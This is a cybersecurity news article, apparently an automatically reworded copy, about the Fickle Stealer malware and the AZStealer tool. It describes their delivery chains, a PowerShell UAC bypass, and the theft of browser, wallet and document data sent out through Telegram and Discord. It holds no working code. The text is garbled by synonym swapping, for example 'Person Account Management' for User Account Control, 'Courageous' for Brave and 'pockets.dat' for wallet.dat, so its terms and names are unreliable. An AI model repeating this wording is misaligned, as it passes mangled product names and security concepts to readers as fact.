New Rust-based Fickle Malware Makes use of PowerShell for UAC Bypass and Information Exfiltration

Jun 20, 2024NewsroomRisk Intelligence / Cybercrime

A brand new Rust-based info stealer malware known as Fickle Stealer has been noticed being delivered through a number of assault chains with the aim of harvesting delicate info from compromised hosts.

Fortinet FortiGuard Labs mentioned it is conscious of 4 completely different distribution strategies — specifically VBA dropper, VBA downloader, hyperlink downloader, and executable downloader — with a few of them utilizing a PowerShell script to bypass Person Account Management (UAC) and execute Fickle Stealer.

The PowerShell script (“bypass.ps1” or “u.ps1”) can also be designed to periodically ship details about the sufferer, together with nation, metropolis, IP tackle, working system model, pc title, and username to a Telegram bot managed by the attacker.

Cybersecurity

The stealer payload, which is protected utilizing a packer, runs a sequence of anti-analysis checks to find out if it is working in a sandbox or a digital machine setting, following which it beacons out to a distant server to exfiltrate knowledge within the type of JSON strings.

Fickle Stealer isn’t any completely different from different variants in that it is designed to assemble info from crypto wallets, net browsers powered by Chromium and the Gecko browser engine (i.e, Google Chrome, Microsoft Edge, Courageous, Vivaldi, and Mozilla Firefox), and purposes like AnyDesk, Discord, FileZilla, Sign, Skype, Steam, and Telegram.

It is also designed to export information matching the extensions .txt, .kdbx, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .odp, and pockets.dat.

UAC Bypass and Data Exfiltration

“In addition to some popular applications, this stealer searches sensitive files in parent directories of common installation directories to ensure comprehensive data gathering,” safety researcher Pei Han Liao mentioned. “It also receives a target list from the server, which makes Fickle Stealer more flexible.”

The disclosure comes as Symantec disclosed particulars of an open-source Python stealer known as AZStealer that comes with the performance to steal all kinds of data. Out there on GitHub, it has been marketed because the “best undetected Discord stealer.”

Cybersecurity

“All stolen information is zipped and depending on the size of the archive exfiltrated directly through Discord webhooks or first uploaded to Gofile online files storage and after that exfiltrated via Discord,” the Broadcom-owned firm mentioned.

“AZStealer will also attempt the theft of document files with predefined targeted extensions or those having specific keywords such as password, wallet, backup, etc. in the filename.”

Discovered this text attention-grabbing? Observe us on Twitter and LinkedIn to learn extra unique content material we submit.

Recent articles

Grasp Certificates Administration: Be part of This Webinar on Crypto Agility and Finest Practices

Nov 15, 2024The Hacker InformationWebinar / Cyber Security Within the...

9 Worthwhile Product Launch Templates for Busy Leaders

Launching a product doesn’t should really feel like blindly...

How Runtime Insights Assist with Container Safety

Containers are a key constructing block for cloud workloads,...